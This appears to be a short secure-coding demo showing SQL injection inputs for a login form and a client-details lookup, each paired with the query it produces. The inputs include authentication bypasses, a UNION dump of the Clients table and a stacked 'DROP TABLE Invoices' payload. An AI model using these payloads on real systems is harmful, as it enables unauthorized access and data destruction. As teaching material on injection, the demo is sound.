# Secure coding - SQL Injection demo
## Query to test
### Connection query

Input :
 - Username : Antony
 - Password : ' OR ''='

```sql
SELECT * FROM Clients WHERE Username = 'Antony' AND Password = '' OR ''=''
```

Input :
 - Username : Antony' --
 - Password : test (no matter)

```sql
SELECT * FROM Clients WHERE Username = 'Antony' --' AND Password = 'test'
```

Input :
 - Username : Jean' UNION SELECT * FROM Clients --
 - Password : test (no matter)

```sql
SELECT * from Clients WHERE Username = 'Jean' UNION SELECT * FROM Clients --' AND Password = 'test'
```

Input :
 - Username : ' OR 1=1 --
 - Password : test (no matter)

```sql
SELECT * from Clients WHERE Username = '' OR 1=1 --' AND Password = 'test'
```

### User details

Input :
 - IdClient : 1; DROP TABLE Invoices

```sql
SELECT * FROM Clients WHERE IdClient = 1; DROP TABLE Invoices;
```

Input :
 - IdClient : 1 OR 1=1

```sql
SELECT * FROM Clients WHERE IdClient = 1 OR 1=1;
```



